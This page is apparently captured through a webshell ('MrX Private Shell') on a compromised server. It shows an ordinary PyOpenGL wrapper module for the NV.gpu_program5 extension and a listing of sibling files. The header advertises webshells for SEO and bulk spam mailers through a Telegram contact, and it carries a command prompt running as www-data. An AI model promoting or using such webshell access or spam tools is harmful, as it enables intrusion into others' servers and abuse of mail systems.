__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.217.60: ~ $
'''OpenGL extension NV.gpu_program5

This module customises the behaviour of the 
OpenGL.raw.GL.NV.gpu_program5 to provide a more 
Python-friendly API

Overview (from the spec)
	
	This specification documents the common instruction set and basic
	functionality provided by NVIDIA's 5th generation of assembly instruction
	sets supporting programmable graphics pipeline stages.
	
	The instruction set builds upon the basic framework provided by the
	ARB_vertex_program and ARB_fragment_program extensions to expose
	considerably more capable hardware.  In addition to new capabilities for
	vertex and fragment programs, this extension provides new functionality
	for geometry programs as originally described in the NV_geometry_program4
	specification, and serves as the basis for the new tessellation control
	and evaluation programs described in the NV_tessellation_program5
	extension.
	
	Programs using the functionality provided by this extension should begin
	with the program headers "!!NVvp5.0" (vertex programs), "!!NVtcp5.0"
	(tessellation control programs), "!!NVtep5.0" (tessellation evaluation
	programs), "!!NVgp5.0" (geometry programs), and "!!NVfp5.0" (fragment
	programs).
	
	This extension provides a variety of new features, including:
	
	  * support for 64-bit integer operations;
	
	  * the ability to dynamically index into an array of texture units or
	    program parameter buffers;
	
	  * extending texel offset support to allow loading texel offsets from
	    regular integer operands computed at run-time, instead of requiring
	    that the offsets be constants encoded in texture instructions;
	
	  * extending TXG (texture gather) support to return the 2x2 footprint
	    from any component of the texture image instead of always returning
	    the first (x) component;
	
	  * extending TXG to support shadow comparisons in conjunction with a
	    depth texture, via the SHADOW* targets;
	
	  * further extending texture gather support to provide a new opcode
	    (TXGO) that applies a separate texel offset vector to each of the four
	    samples returned by the instruction; 
	
	  * bit manipulation instructions, including ones to find the position of
	    the most or least significant set bit, bitfield insertion and
	    extraction, and bit reversal;
	
	  * a general data conversion instruction (CVT) supporting conversion
	    between any two data types supported by this extension; and
	
	  * new instructions to compute the composite of a set of boolean
	    conditions a group of shader threads.
	
	This extension also provides some new capabilities for individual program
	types, including:
	
	  * support for instanced geometry programs, where a geometry program may
	    be run multiple times for each primitive;
	
	  * support for emitting vertices in a geometry program where each vertex
	    emitted may be directed at a specified vertex stream and captured
	    using the ARB_transform_feedback3 extension;
	
	  * support for interpolating an attribute at a programmable offset
	    relative to the pixel center (IPAO), at a programmable sample number
	    (IPAS), or at the fragment's centroid location (IPAC) in a fragment
	    program;
	
	  * support for reading a mask of covered samples in a fragment program;
	
	  * support for reading a point sprite coordinate directly in a fragment
	    program, without overriding a texture coordinate;
	
	  * support for reading patch primitives and per-patch attributes
	    (introduced by ARB_tessellation_shader) in a geometry program; and
	
	  * support for multiple output vectors for a single color output in a
	    fragment program (as used by ARB_blend_func_extended).
	
	This extension also provides optional support for 64-bit-per-component
	variables and 64-bit floating-point arithmetic.  These features are
	supported if and only if "NV_gpu_program_fp64" is found in the extension
	string.
	
	This extension incorporates the memory access operations from the
	NV_shader_buffer_load and NV_parameter_buffer_object2 extensions,
	originally built as add-ons to NV_gpu_program4.  It also provides the
	following new capabilities:
	
	  * support for the features without requiring a separate OPTION keyword;
	
	  * support for indexing into an array of constant buffers using the LDC
	    opcode added by NV_parameter_buffer_object2;
	
	  * support for storing into buffer objects at a specified GPU address
	    using the STORE opcode, an allowing applications to create READ_WRITE
	    and WRITE_ONLY mappings when making a buffer object resident using the
	    API mechanisms in the NV_shader_buffer_store extension;
	
	  * storage instruction modifiers to allow loading and storing 64-bit
	    component values;
	
	  * support for atomic memory transactions using the ATOM opcode, where
	    the instruction atomically reads the memory pointed to by a pointer,
	    performs a specified computation, stores the results of that
	    computation, and returns the original value read;
	
	  * support for memory barrier transactions using the MEMBAR opcode, which
	    ensures that all memory stores issued prior to the opcode complete
	    prior to any subsequent memory transactions; and
	
	  * a fragment program option to specify that depth and stencil tests are
	    performed prior to fragment program execution.
	
	Additionally, the assembly program languages supported by this extension
	include support for reading, writing, and performing atomic memory
	operations on texture image data using the opcodes and mechanisms
	documented in the "Dependencies on NV_gpu_program5" section of the
	EXT_shader_image_load_store extension.

The official definition of this extension is available here:
http://www.opengl.org/registry/specs/NV/gpu_program5.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.NV.gpu_program5 import *
from OpenGL.raw.GL.NV.gpu_program5 import _EXTENSION_NAME

def glInitGpuProgram5NV():
    '''Return boolean indicating whether this extension is available'''
    from OpenGL import extensions
    return extensions.hasGLExtension( _EXTENSION_NAME )

# INPUT glProgramSubroutineParametersuivNV.params size not checked against count
glProgramSubroutineParametersuivNV=wrapper.wrapper(glProgramSubroutineParametersuivNV).setInputArraySize(
    'params', None
)
glGetProgramSubroutineParameteruivNV=wrapper.wrapper(glGetProgramSubroutineParameteruivNV).setOutput(
    'param',size=_glgets._glget_size_mapping,pnameArg='target',orPassIn=True
)
### END AUTOGENERATED SECTION

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 23 B 0644
alpha_to_coverage_dither_control.py File 1.03 KB 0644
bindless_multi_draw_indirect.py File 1.78 KB 0644
bindless_multi_draw_indirect_count.py File 1.09 KB 0644
bindless_texture.py File 3.75 KB 0644
blend_equation_advanced.py File 5.21 KB 0644
blend_equation_advanced_coherent.py File 856 B 0644
blend_minmax_factor.py File 1.59 KB 0644
blend_square.py File 1.26 KB 0644
clip_space_w_scaling.py File 2.52 KB 0644
command_list.py File 3.16 KB 0644
compute_program5.py File 1.17 KB 0644
compute_shader_derivatives.py File 1.4 KB 0644
conditional_render.py File 2.22 KB 0644
conservative_raster.py File 1.59 KB 0644
conservative_raster_dilate.py File 1.42 KB 0644
conservative_raster_pre_snap.py File 1.14 KB 0644
conservative_raster_pre_snap_triangles.py File 2.21 KB 0644
conservative_raster_underestimation.py File 1.49 KB 0644
copy_depth_to_color.py File 2.35 KB 0644
copy_image.py File 1.09 KB 0644
deep_texture3D.py File 1.16 KB 0644
depth_buffer_float.py File 1.97 KB 0644
depth_clamp.py File 2.32 KB 0644
draw_texture.py File 2.01 KB 0644
draw_vulkan_image.py File 2.29 KB 0644
evaluators.py File 4.78 KB 0644
explicit_multisample.py File 1.62 KB 0644
fence.py File 2.69 KB 0644
fill_rectangle.py File 1.16 KB 0644
float_buffer.py File 4.33 KB 0644
fog_distance.py File 2.44 KB 0644
fragment_coverage_to_color.py File 1.5 KB 0644
fragment_program.py File 4.54 KB 0644
fragment_program2.py File 1.92 KB 0644
fragment_program4.py File 2.2 KB 0644
fragment_program_option.py File 1.79 KB 0644
fragment_shader_barycentric.py File 1.27 KB 0644
fragment_shader_interlock.py File 3.83 KB 0644
framebuffer_mixed_samples.py File 3.55 KB 0644
framebuffer_multisample_coverage.py File 1.81 KB 0644
geometry_program4.py File 3.23 KB 0644
geometry_shader4.py File 1.3 KB 0644
geometry_shader_passthrough.py File 3.28 KB 0644
gpu_multicast.py File 2.7 KB 0644
gpu_program4.py File 4.41 KB 0644
gpu_program5.py File 6.46 KB 0644
gpu_program5_mem_extended.py File 2.45 KB 0644
gpu_shader5.py File 6.27 KB 0644
half_float.py File 3.91 KB 0644
internalformat_sample_query.py File 2.92 KB 0644
light_max_exponent.py File 1.26 KB 0644
memory_attachment.py File 1.11 KB 0644
memory_object_sparse.py File 881 B 0644
mesh_shader.py File 1.23 KB 0644
multisample_coverage.py File 2.03 KB 0644
multisample_filter_hint.py File 1.51 KB 0644
occlusion_query.py File 4.35 KB 0644
packed_depth_stencil.py File 4.46 KB 0644
parameter_buffer_object.py File 2.52 KB 0644
parameter_buffer_object2.py File 2.52 KB 0644
path_rendering.py File 25.2 KB 0644
path_rendering_shared_edge.py File 1.41 KB 0644
pixel_data_range.py File 3.82 KB 0644
point_sprite.py File 2.16 KB 0644
present_video.py File 2.08 KB 0644
primitive_restart.py File 2 KB 0644
primitive_shading_rate.py File 1.98 KB 0644
query_resource.py File 2.03 KB 0644
query_resource_tag.py File 1.44 KB 0644
register_combiners.py File 5.44 KB 0644
register_combiners2.py File 2.48 KB 0644
representative_fragment_test.py File 2.37 KB 0644
robustness_video_memory_purge.py File 1.98 KB 0644
sample_locations.py File 2.64 KB 0644
sample_mask_override_coverage.py File 1.21 KB 0644
scissor_exclusive.py File 1.66 KB 0644
shader_atomic_counters.py File 1.24 KB 0644
shader_atomic_float.py File 1.58 KB 0644
shader_atomic_float64.py File 1.53 KB 0644
shader_atomic_fp16_vector.py File 1.05 KB 0644
shader_atomic_int64.py File 1.01 KB 0644
shader_buffer_load.py File 5.84 KB 0644
shader_buffer_store.py File 2.16 KB 0644
shader_storage_buffer_object.py File 1.26 KB 0644
shader_subgroup_partitioned.py File 1.41 KB 0644
shader_texture_footprint.py File 3.83 KB 0644
shader_thread_group.py File 2.5 KB 0644
shader_thread_shuffle.py File 1.53 KB 0644
shading_rate_image.py File 3.83 KB 0644
stereo_view_rendering.py File 2.1 KB 0644
tessellation_program5.py File 5.23 KB 0644
texgen_emboss.py File 1.7 KB 0644
texgen_reflection.py File 1.34 KB 0644
texture_barrier.py File 929 B 0644
texture_compression_vtc.py File 1.13 KB 0644
texture_env_combine4.py File 1.57 KB 0644
texture_expand_normal.py File 1.26 KB 0644
texture_multisample.py File 1.35 KB 0644
texture_rectangle.py File 2.2 KB 0644
texture_rectangle_compressed.py File 1.04 KB 0644
texture_shader.py File 8.61 KB 0644
texture_shader2.py File 1.42 KB 0644
texture_shader3.py File 4.71 KB 0644
timeline_semaphore.py File 1.29 KB 0644
transform_feedback.py File 4.21 KB 0644
transform_feedback2.py File 2.56 KB 0644
uniform_buffer_std430_layout.py File 1.49 KB 0644
uniform_buffer_unified_memory.py File 1.32 KB 0644
vdpau_interop.py File 2.26 KB 0644
vdpau_interop2.py File 1.15 KB 0644
vertex_array_range.py File 4.84 KB 0644
vertex_array_range2.py File 1.34 KB 0644
vertex_attrib_integer_64bit.py File 2.29 KB 0644
vertex_buffer_unified_memory.py File 1.48 KB 0644
vertex_program.py File 9.02 KB 0644
vertex_program1_1.py File 1.98 KB 0644
vertex_program2.py File 4.61 KB 0644
vertex_program2_option.py File 1.7 KB 0644
vertex_program3.py File 1.49 KB 0644
vertex_program4.py File 3.52 KB 0644
video_capture.py File 2.38 KB 0644
viewport_array2.py File 1.88 KB 0644
viewport_swizzle.py File 1.68 KB 0644
Filemanager